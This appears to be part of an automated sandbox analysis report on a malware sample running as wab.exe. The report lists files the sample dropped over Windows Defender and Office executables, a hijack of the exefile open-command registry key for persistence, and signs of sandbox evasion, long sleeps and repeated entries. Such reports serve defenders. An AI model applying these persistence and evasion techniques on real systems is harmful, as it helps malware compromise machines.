Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000006.00000002.2402584546.00000000034C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDOWS.FOUNDATION.DIAGNOSTICS.ASYNCCAUSALITYTRACER.DLL
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4475 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5422 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5923 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3920 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
